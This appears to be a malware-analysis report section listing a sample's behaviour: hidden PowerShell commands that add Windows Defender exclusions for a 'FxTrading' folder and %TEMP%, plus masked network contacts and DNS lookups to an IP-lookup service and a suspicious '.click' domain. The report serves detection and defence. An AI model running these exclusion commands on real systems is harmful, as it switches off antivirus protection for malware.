Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NonInteractive -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath \"%ALLUSERSPROFILE%\FxTrading\""
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NonInteractive -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath \"%TEMP%\""
- 'ip##pi.com':80
- 'nu#####oftware.click':443
- 'x1.#.lencr.org':80
- http://ip##pi.com/json/?fi#####################################
- http://x1.#.lencr.org/
- 'nu#####oftware.click':443
- DNS ASK ip##pi.com
- DNS ASK nu#####oftware.click
- DNS ASK x1.#.lencr.org